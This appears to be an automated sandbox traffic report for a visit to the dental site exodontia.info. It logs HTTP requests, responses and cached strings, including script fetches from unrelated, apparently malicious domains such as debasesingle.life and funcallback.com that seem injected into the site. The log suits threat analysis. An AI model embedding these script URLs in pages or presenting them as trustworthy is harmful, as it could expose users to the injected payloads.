Source: global trafficHTTP traffic detected: GET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1Host: stake.libertariancounterpoint.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/styles/modules/filters/none.css?ver=5.7.0 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
Source: global trafficHTTP traffic detected: GET /browser.php?pixel=1&os=win&browser=chrome&domain=exodontia.info HTTP/1.1Host: cdnreport.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lumps-bumps-patches/ HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/shutterstock_1642040905-scaled.jpg HTTP/1.1Host: exodontia.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
Source: global trafficHTTP traffic detected: GET /9hFXWz7m HTTP/1.1Host: debasesingle.lifeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /drugs-for-oral-conditions/ HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/themify-concate/826651810/themify-701353600.css HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/drugs-for-oral-conditions/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953653.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953653.0.0.0
Source: global trafficHTTP traffic detected: GET /WyNzslZcNXc4hHNvLCDDiTamINVoxtt-L-d6Ayg3PMl HTTP/1.1Host: funcallback.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/drugs-for-oral-conditions/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953653.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953653.0.0.0
Source: global trafficHTTP traffic detected: GET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1Host: stake.libertariancounterpoint.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SDQxw16j HTTP/1.1Host: gspiceyl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9hFXWz7m HTTP/1.1Host: debasesingle.lifeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adverts-sponsors-policy/ HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://exodontia.info/drugs-for-oral-conditions/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.1.1713953655.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.1.1713953655.0.0.0
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/themify-concate/826651810/themify-4036982551.css HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/adverts-sponsors-policy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.1.1713953663.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.1.1713953663.0.0.0
Source: global trafficHTTP traffic detected: GET /WyNzslZcNXc4hHNvLCDDiTamINVoxtt-L-d6Ayg3PMl HTTP/1.1Host: funcallback.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/adverts-sponsors-policy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.1.1713953663.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.1.1713953663.0.0.0
Source: global trafficHTTP traffic detected: GET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1Host: stake.libertariancounterpoint.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SDQxw16j HTTP/1.1Host: gspiceyl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9hFXWz7m HTTP/1.1Host: debasesingle.lifeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: funcallback.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_146.1.drString found in binary or memory: <a href="https://www.facebook.com/Dentalhealthstop" title="Visit Dental Health Stop's Facebook page" target="_blank"><i class="fa fa-facebook-official fa" aria-hidden="true"></i></a> equals www.facebook.com (Facebook)
Source: chromecache_136.1.drString found in binary or memory: Math.round(p);v["gtm.videoCurrentTime"]=Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Pj:function(){e=zb()},sd:function(){d()}}};var dc=ka(["data-gtm-yt-inspected-"]),AC=["www.youtube.com","www.youtube-nocookie.com"],BC,CC=!1; equals www.youtube.com (Youtube)
Source: chromecache_136.1.drString found in binary or memory: e||f||g.length||h.length))return;var n={Yg:d,Wg:e,Xg:f,Ih:g,Jh:h,ye:m,Ab:b},p=D.YT,q=function(){IC(n)};if(p)return p.ready&&p.ready(q),b;var r=D.onYouTubeIframeAPIReady;D.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(LC(w,"iframe_api")||LC(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,B=0;B<y;B++)if(!CC&&JC(x[B],n.ye))return Ic("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_208.1.dr, chromecache_161.1.dr, chromecache_203.1.dr, chromecache_169.1.drString found in binary or memory: return b}yC.J="internal.enableAutoEventOnTimer";var dc=ka(["data-gtm-yt-inspected-"]),AC=["www.youtube.com","www.youtube-nocookie.com"],BC,CC=!1; equals www.youtube.com (Youtube)
Source: unknownDNS traffic detected: queries for: funcallback.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:12:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 147Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 24 Apr 2024 10:12:28 GMTVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:12:29 GMTContent-Type: text/htmlContent-Length: 548Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:12:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 147Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 24 Apr 2024 10:12:36 GMTVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:12:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 147Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 24 Apr 2024 10:12:40 GMTVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:12:47 GMTContent-Type: text/html; charset=utf-8Content-Length: 147Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 24 Apr 2024 10:12:47 GMTVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:13:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 147Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 24 Apr 2024 10:13:00 GMTVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 24 Apr 2024 10:13:33 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenX-Content-Type-Options: nosniffX-Robots-Tag: noindex,nofollowExpires: Fri, 01 Jan 1990 00:00:00 GMTCache-Control: no-cache, must-revalidateContent-Type: text/plain; charset=UTF-8Pragma: no-cacheVary: X-OriginVary: RefererDate: Wed, 24 Apr 2024 10:13:49 GMTServer: scaffolding on HTTPServer2X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Origin,Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"server-timing: wp-before-template;dur=46.72transfer-encoding: chunkeddate: Wed, 24 Apr 2024 10:14:07 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:14:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:14:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"server-timing: wp-before-template;dur=57.18transfer-encoding: chunkeddate: Wed, 24 Apr 2024 10:14:17 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:14:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"server-timing: wp-before-template;dur=42.18transfer-encoding: chunkeddate: Wed, 24 Apr 2024 10:14:26 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:14:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: chromecache_201.1.drString found in binary or memory: http://fontawesome.io
Source: chromecache_201.1.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_168.1.drString found in binary or memory: http://meyerweb.com/eric/tools/css/reset/
Source: chromecache_227.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b302
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b304
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b306
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b307
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b309
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b30b
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b30e
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b311
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b314
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b315
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b316
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b319
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b31a
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b31d
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b31f
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b321
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b324
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b327
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b328
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b329
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b32c
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b32d
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b32f
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b331
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b332
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b333
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b335
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b336
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b337
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b338
Source: chromecache_165.1.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735b339
Source: chromecache_168.1.drString found in binary or memory: http://underscores.me/
Source: chromecache_168.1.drString found in binary or memory: http://verypaulcherry.co.uk
Source: chromecache_198.1.dr, chromecache_172.1.dr, chromecache_187.1.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
Source: chromecache_136.1.dr, chromecache_161.1.dr, chromecache_169.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk
Source: chromecache_136.1.dr, chromecache_161.1.dr, chromecache_169.1.drString found in binary or memory: https://adservice.googlesyndication.com/pagead/regclk
Source: chromecache_231.1.dr, chromecache_138.1.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: chromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drString found in binary or memory: https://api.w.org/
Source: chromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drString found in binary or memory: https://autoprefixer.github.io
Source: chromecache_208.1.dr, chromecache_136.1.dr, chromecache_161.1.dr, chromecache_203.1.dr, chromecache_169.1.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_207.1.drString found in binary or memory: https://cdn.fontawesome.com:443
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: chromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drString found in binary or memory: https://debasesingle.life/9hFXWz7m
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://dentalhealthstop.co.uk/
Source: chromecache_170.1.drString found in binary or memory: https://dentalhealthstop.co.uk/contact
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://dentalhealthstop.co.uk/contact/
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://dentalhealthstop.co.uk/dental-emergencies/
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://dentalhealthstop.co.uk/nhs-dental-treatments/
Source: chromecache_170.1.dr, chromecache_146.1.drString found in binary or memory: https://dentalhealthstop.co.uk/nhs-dental-treatments/amalgam-fillings/
